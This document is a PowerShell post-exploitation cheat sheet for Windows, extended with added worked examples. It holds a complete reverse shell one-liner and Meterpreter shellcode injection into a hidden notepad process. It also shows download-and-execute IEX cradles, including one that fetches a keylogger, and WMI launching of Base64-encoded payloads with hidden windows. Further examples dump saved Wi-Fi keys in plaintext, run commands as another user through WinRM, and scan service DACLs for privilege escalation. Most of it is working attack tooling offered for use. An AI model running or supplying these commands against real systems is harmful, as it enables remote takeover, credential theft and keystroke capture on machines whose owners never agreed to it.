Reverse Shell One liner

$client = New-Object System.Net.Sockets.TCPClient("<LHOST>",<LPORT>);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "# ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close();



Scenario: you have admin credentials and a shell on the target. Start a hidden, throw-away process and inject a Meterpreter stager into it with PowerSploit's Invoke-Shellcode (the SysWOW64 notepad.exe is the 32-bit binary, matching a 32-bit payload).


Start-Process C:\Windows\SysWOW64\notepad.exe -WindowStyle Hidden

$Proc = Get-Process notepad

Invoke-Shellcode -ProcessId $Proc.Id -Payload windows/meterpreter/reverse_https -Lhost <ip> -Lport 443 -Verbose

# Or, load Invoke-Shellcode straight from the web and inject into the current PowerShell process
# (later PowerSploit releases dropped the built-in -Payload option; with those, generate the stager with msfvenom and pass the bytes via -Shellcode)

IEX (New-Object Net.WebClient).DownloadString('https://raw.github.com/mattifestation/PowerSploit/master/CodeExecution/Invoke-Shellcode.ps1'); Invoke-Shellcode -Payload windows/meterpreter/reverse_https -Lhost <ip> -Lport 443 -Force


Run a Base64-encoded PowerShell command on another Windows host over WMI (Win32_Process.Create, DCOM on TCP 135 plus a dynamic port) with explicit credentials. The method only returns a status code and the new PID, not the command's output, so the payload has to call back on its own.

Invoke-WmiMethod -Class Win32_Process -Name create -ArgumentList "powershell.exe -enc [Base64 encoded string]" -ComputerName [victim IP] -Credential [Username]



IEX (New-Object Net.WebClient).DownloadString('https://raw.github.com/mattifestation/PowerSploit/master/Exfiltration/Get-Keystrokes.ps1')

Get-Keystrokes -LogPath C:\key.log -CollectionInterval 1

Exfiltration/Out-Minidump.ps1 (write a full memory dump of a process to a minidump file)

Exfiltration/Get-TimedScreenshot.ps1 (take screenshots of the victim's desktop at a fixed interval)



Pull information from the PowerShell environment: PuTTY sessions, recently used commands, shares, environment variables, SNMP settings, installed applications, domain information, user information, system information and wireless information.

powershell -ExecutionPolicy bypass -file Get-Information.ps1


Pull down all of the saved Wi-Fi profiles and their stored settings, including the SSID and the pre-shared key.
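As an added example (not code from the original page), the following PowerShell does the same job with built-in tooling: it exports every saved profile with netsh, reads the SSID and key out of the exported XML, and then deletes the export folder, because each exported file holds the key in plaintext. The function name and scratch folder are my own choices; the netsh syntax and XML element names are those of the Windows Native Wifi profile format.

```powershell
# Added example: dump saved Wi-Fi profiles and their plaintext keys via netsh export.
# Assumes the WLAN AutoConfig service (wlansvc) is running and that the caller may
# read key material (depending on Windows version this may need an elevated context).
function Get-SavedWlanKey {
    [CmdletBinding()]
    param(
        # Scratch folder for the XML export (assumed path). It is removed afterwards
        # because every exported file contains the key in clear text.
        [string]$ExportFolder = (Join-Path $env:TEMP ('wlan_' + [guid]::NewGuid().ToString('N')))
    )

    New-Item -ItemType Directory -Path $ExportFolder -Force | Out-Null
    try {
        # netsh writes one Wi-Fi-<profile>.xml per saved profile; key=clear asks for the
        # unencrypted key instead of the DPAPI-protected blob.
        $out = netsh.exe wlan export profile key=clear folder="$ExportFolder" 2>&1
        if ($LASTEXITCODE -ne 0) { throw "netsh wlan export failed: $out" }

        foreach ($file in Get-ChildItem -Path $ExportFolder -Filter '*.xml') {
            [xml]$xml = Get-Content -Path $file.FullName -Raw
            $p   = $xml.WLANProfile
            $sec = $p.MSM.security
            # Open and 802.1X networks carry no sharedKey element, so guard the lookup.
            [pscustomobject]@{
                Profile        = $p.name
                SSID           = $p.SSIDConfig.SSID.name
                Authentication = $sec.authEncryption.authentication
                Encryption     = $sec.authEncryption.encryption
                Key            = if ($sec.sharedKey) { $sec.sharedKey.keyMaterial } else { $null }
            }
        }
    }
    finally {
        # Do not leave plaintext keys on disk.
        Remove-Item -Path $ExportFolder -Recurse -Force -ErrorAction SilentlyContinue
    }
}

Get-SavedWlanKey | Format-Table -AutoSize
```

The export-and-parse route is preferred over scraping `netsh wlan show profile ... key=clear`, whose labels ("Key Content") are localized; the XML element names are not. On a host with no wireless adapter netsh exits non-zero and the function throws rather than returning an empty list silently.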



Use with the PowerSploit reverse shells. It starts a listener and can migrate into another process once a target connects.

python ./StartListner.py [Host IP] 443


Use with PowerShell commands to encode them as Base64 for powershell.exe -EncodedCommand. This sidesteps quoting problems and naive string matching on the command line, but it is not obfuscation: PowerShell decodes it before running, script block logging records the decoded command, and AV/EDR products decode -enc arguments routinely.

echo "IEX (New-Object Net.WebClient).DownloadString('https://raw.github.com/mattifestation/PowerSploit/master/CodeExecution/Invoke-Shellcode.ps1'); Invoke-Shellcode -Payload windows/meterpreter/reverse_https -Lhost <ip> -Lport 443 -Force" > raw.txt

./ps_encoder.py -s raw.txt
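Added example (not code from the original page or from the scripts it names) covering both the encoding step and the WMI remote-execution step above: it builds the -EncodedCommand string in PowerShell itself, verifies it decodes back to the original, and hands it to Win32_Process.Create on a remote host. Function names, the placeholder host, user and URL are my own; the encoding rule (Base64 of UTF-16LE) and the Win32_Process return codes are as documented for powershell.exe and WMI.

```powershell
# Added example: encode a command for powershell.exe -EncodedCommand and run it over WMI.
function ConvertTo-EncodedCommand {
    param([Parameter(Mandatory)][string]$Command)
    # -EncodedCommand expects Base64 of the UTF-16LE ("Unicode") bytes, not UTF-8;
    # an encoder that picks the wrong encoding produces a payload that decodes to garbage.
    [Convert]::ToBase64String([Text.Encoding]::Unicode.GetBytes($Command))
}

function ConvertFrom-EncodedCommand {
    param([Parameter(Mandatory)][string]$Encoded)
    # Same operation PowerShell (and any defender with a captured -enc string) performs.
    [Text.Encoding]::Unicode.GetString([Convert]::FromBase64String($Encoded))
}

function Invoke-WmiEncodedCommand {
    param(
        [Parameter(Mandatory)][string]$ComputerName,
        [Parameter(Mandatory)][pscredential]$Credential,
        [Parameter(Mandatory)][string]$Command
    )
    $enc = ConvertTo-EncodedCommand -Command $Command
    $cmdLine = "powershell.exe -NoProfile -NonInteractive -WindowStyle Hidden -EncodedCommand $enc"
    # Win32_Process.Create only reports a status and the new PID; stdout is not returned.
    $r = Invoke-WmiMethod -Class Win32_Process -Name Create -ArgumentList $cmdLine `
        -ComputerName $ComputerName -Credential $Credential
    $status = switch ($r.ReturnValue) {
        0  { 'Success' }
        2  { 'Access denied' }
        3  { 'Insufficient privilege' }
        9  { 'Path not found' }
        21 { 'Invalid parameter' }
        default { "Error $($r.ReturnValue)" }
    }
    [pscustomobject]@{ Status = $status; ReturnValue = $r.ReturnValue; ProcessId = $r.ProcessId }
}

# Local round-trip check before touching the target (placeholder URL, assumed).
$payload = "IEX (New-Object Net.WebClient).DownloadString('http://<LHOST>/Invoke-Shellcode.ps1')"
$enc = ConvertTo-EncodedCommand -Command $payload
if ((ConvertFrom-EncodedCommand -Encoded $enc) -ne $payload) { throw 'encoding round-trip failed' }
"powershell.exe -enc $enc"

# Against a target (placeholders):
# $cred = Get-Credential 'DOMAIN\user'
# Invoke-WmiEncodedCommand -ComputerName '<victim IP>' -Credential $cred -Command $payload
```

A ReturnValue of 2 with valid credentials usually means the account is not a local administrator on the target (WMI remote process creation needs it), not a bad password.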

Get System Release ID

(Get-Item "HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion").GetValue('ReleaseId')

# Note: from Windows 10 20H2 onwards ReleaseId stays at 2009; the DisplayVersion value in the same key carries the marketing version (e.g. 22H2)

Executing Command as Another User

You have a user's credentials but cannot connect to the machine as that user from outside (for example, WinRM is not reachable). All you have is a shell running in a service context on the box.

$pass = ConvertTo-SecureString '<passwd>' -AsPlainText -Force
$cred = New-Object System.Management.Automation.PSCredential('.\hector', $pass)
Invoke-Command -ComputerName <computer-name> -Credential $cred -ScriptBlock { IEX (New-Object Net.WebClient).DownloadString('') }

# This goes through WinRM (TCP 5985/5986): the listener must be enabled and the account must be a local administrator or a member of Remote Management Users. From a shell on the box itself, <computer-name> can simply be localhost.
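Added example (not from the original page) of the same move wrapped in a function: it builds the credential, checks that the local WinRM listener is up, runs the script block through it, and first confirms the context actually changed. The function name and the sample user are placeholders I chose; '.\hector' mirrors the page's own example.

```powershell
# Added example: run a script block as another local user from a service shell by
# going through the loopback WinRM listener, which accepts explicit credentials even
# when WinRM is not reachable from the attacker's side.
function Invoke-AsLocalUser {
    param(
        [Parameter(Mandatory)][string]$UserName,        # '.\user' for a local account
        [Parameter(Mandatory)][string]$PlainPassword,
        [Parameter(Mandatory)][scriptblock]$ScriptBlock
    )
    $secure = ConvertTo-SecureString -String $PlainPassword -AsPlainText -Force
    $cred   = New-Object System.Management.Automation.PSCredential($UserName, $secure)

    # Test-WSMan throws when no WinRM listener answers; fail early with a clear message.
    try { Test-WSMan -ComputerName localhost -ErrorAction Stop | Out-Null }
    catch { throw "WinRM is not reachable on localhost: $($_.Exception.Message)" }

    # The account must be a local administrator or in 'Remote Management Users';
    # otherwise this fails with a WinRM access-denied error rather than a logon error.
    Invoke-Command -ComputerName localhost -Credential $cred -ScriptBlock $ScriptBlock
}

# Sanity check: who are we now, which groups, and at what integrity level?
# (S-1-5-32-544 = BUILTIN\Administrators, S-1-16-* = integrity labels; placeholder password)
Invoke-AsLocalUser -UserName '.\hector' -PlainPassword '<passwd>' -ScriptBlock {
    whoami
    whoami /groups | Select-String 'S-1-5-32-544|S-1-16'
}
```

Because the session is a fresh network logon on the same host, there is no double-hop problem for local resources; anything that needs to reach other machines still needs its own credentials inside the script block.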

Get User ACL

# user acl on a registry key, e.g. a service's configuration key (Get-Acl fills $acl; $acl.Access gives the same entries as objects)
$acl = Get-Acl -Path 'HKLM:\SYSTEM\CurrentControlSet\Services\<service>'
ConvertFrom-SddlString -Sddl $acl.Sddl -Type RegistryRights | ForEach-Object { $_.DiscretionaryAcl }

Go into Registry Mode

cd HKLM:

cd SYSTEM\CurrentControlSet\Services

# dump all services

# get all service properties
$services = Get-ItemProperty -Path HKLM:\System\CurrentControlSet\Services\*

# get each key's child name (the service name) and ObjectName (the account the service runs as), and count them;
# if you can manipulate a service, the interesting ones are those running as SYSTEM
$services | Select-Object PSChildName, ObjectName
$services | Measure-Object

$services | where { ($_.ObjectName -match 'LocalSystem') }

# and find those whose Start value is 3 (manual); 2 = automatic, 4 = disabled, 0/1 = boot/system drivers
$services | Where-Object { $_.ObjectName -match 'LocalSystem' -and $_.Start -eq 3 }

# check a service's DACL from PowerShell (call sc.exe explicitly: in PowerShell 'sc' is an alias for Set-Content)
sc.exe sdshow wuauserv

# then (sdshow prints a blank line first, so keep the line that starts with D:)
$sddl = @((sc.exe sdshow wuauserv) -match '^D:')[0]
ConvertFrom-SddlString -Sddl $sddl | ForEach-Object { $_.DiscretionaryAcl }

# list all services that Authenticated Users (AU) are allowed to start (RP = SERVICE_START); the pattern is anchored to Allow ACEs so Deny entries do not match
foreach ($service in $services.PSChildName) {
    $sddl = (sc.exe sdshow $service 2>$null) -join ''
    if ($sddl -match '\(A;;[A-Z]*RP[A-Z]*;;;AU\)') { $service }
}
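Added example (not from the original page) that carries the last two steps through: it parses the sc.exe sdshow output of every key under Services, maps the two-letter SDDL right codes to their service-object meanings, and reports Allow ACEs that give low-privilege groups either the Start right or a right that lets them reconfigure or take over the service. The function names, the "low-privilege" SID list and the "dangerous" right set are my own choices; the right-code meanings are the documented service-object SDDL abbreviations. The sample SDDL at the end is constructed, not taken from a real host.

```powershell
# Added example: audit service DACLs for rights granted to low-privilege trustees.
# SDDL right codes as they apply to service objects (documented abbreviations).
$ServiceRights = @{
    CC = 'QueryConfig'; DC = 'ChangeConfig'; LC = 'QueryStatus'; SW = 'EnumerateDependents'
    RP = 'Start'; WP = 'Stop'; DT = 'PauseContinue'; LO = 'Interrogate'; CR = 'UserDefinedControl'
    SD = 'Delete'; RC = 'ReadControl'; WD = 'WriteDac'; WO = 'WriteOwner'
    GA = 'GenericAll'; GR = 'GenericRead'; GW = 'GenericWrite'; GX = 'GenericExecute'
}
# Trustees every authenticated/interactive user belongs to (my choice of set):
# Authenticated Users, Everyone, Users, Interactive, Guests.
$LowPrivSids = 'AU', 'WD', 'BU', 'IU', 'BG'
# Rights that let the trustee change what the service runs or who controls it (my choice of set).
$Dangerous = 'DC', 'WD', 'WO', 'SD', 'GA', 'GW'

function ConvertFrom-ServiceSddl {
    param([Parameter(Mandatory)][string]$Sddl, [string]$ServiceName = '')
    # An ACE looks like (A;;CCLCSWRPLOCRRC;;;AU): type;flags;rights;;;trustee.
    # SACL entries use the two-letter types AU/AL and are skipped by the one-letter type match.
    $aceRegex = '\((?<type>[AD]);(?<flags>[^;]*);(?<rights>[A-Za-z0-9]*);;;(?<sid>[^)]+)\)'
    foreach ($m in [regex]::Matches($Sddl, $aceRegex)) {
        $raw = $m.Groups['rights'].Value
        # Rights are either two-letter codes run together or a single hex mask (0x...).
        $codes = if ($raw -like '0x*') { @($raw) } else { @([regex]::Matches($raw, '..') | ForEach-Object { $_.Value }) }
        [pscustomobject]@{
            Service   = $ServiceName
            Type      = if ($m.Groups['type'].Value -eq 'A') { 'Allow' } else { 'Deny' }
            Trustee   = $m.Groups['sid'].Value
            RawRights = $codes
            Rights    = @($codes | ForEach-Object { if ($ServiceRights.ContainsKey($_)) { $ServiceRights[$_] } else { $_ } })
        }
    }
}

function Get-ServiceDaclFinding {
    # Walk the same registry list as $services above. sc.exe (not the 'sc' alias for
    # Set-Content) prints a blank line then the SDDL, and fails for keys that are not
    # real service objects; those are skipped.
    foreach ($name in (Get-ChildItem -Path HKLM:\SYSTEM\CurrentControlSet\Services).PSChildName) {
        $sddl = ((sc.exe sdshow $name 2>$null) -join '').Trim()
        if ($LASTEXITCODE -ne 0 -or -not $sddl.StartsWith('D:')) { continue }
        $cfg = Get-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Services\$name" -ErrorAction SilentlyContinue
        foreach ($ace in ConvertFrom-ServiceSddl -Sddl $sddl -ServiceName $name) {
            if ($ace.Type -ne 'Allow' -or $LowPrivSids -notcontains $ace.Trustee) { continue }
            $bad = @($ace.RawRights | Where-Object { $Dangerous -contains $_ })
            if ($bad.Count -eq 0 -and $ace.RawRights -notcontains 'RP') { continue }
            [pscustomobject]@{
                Service   = $name
                RunsAs    = $cfg.ObjectName
                Start     = $cfg.Start          # 2 = automatic, 3 = manual, 4 = disabled
                ImagePath = $cfg.ImagePath
                Trustee   = $ace.Trustee
                CanStart  = ($ace.RawRights -contains 'RP')
                Dangerous = ($bad -join ',')
            }
        }
    }
}

# Constructed sample SDDL (not from a real host): Authenticated Users hold DC (ChangeConfig)
# on the service. If it runs as LocalSystem, its binPath can be repointed at an attacker binary.
$sample = 'D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;BA)(A;;CCDCLCSWRPLOCRRC;;;AU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)'
ConvertFrom-ServiceSddl -Sddl $sample -ServiceName 'sample' | Format-Table Trustee, Type, Rights -AutoSize

# On a live host, the ones worth a second look are those with a non-empty Dangerous column
# that run as LocalSystem:
# Get-ServiceDaclFinding | Where-Object { $_.Dangerous -and $_.RunsAs -eq 'LocalSystem' } | Format-Table -AutoSize
```

CanStart on its own is common and rarely a finding by itself; it matters when combined with a writable ImagePath target, a writable service registry key (the Get-Acl check above), or an unquoted path, because then the low-privilege user can both plant the binary and trigger its execution as the service account.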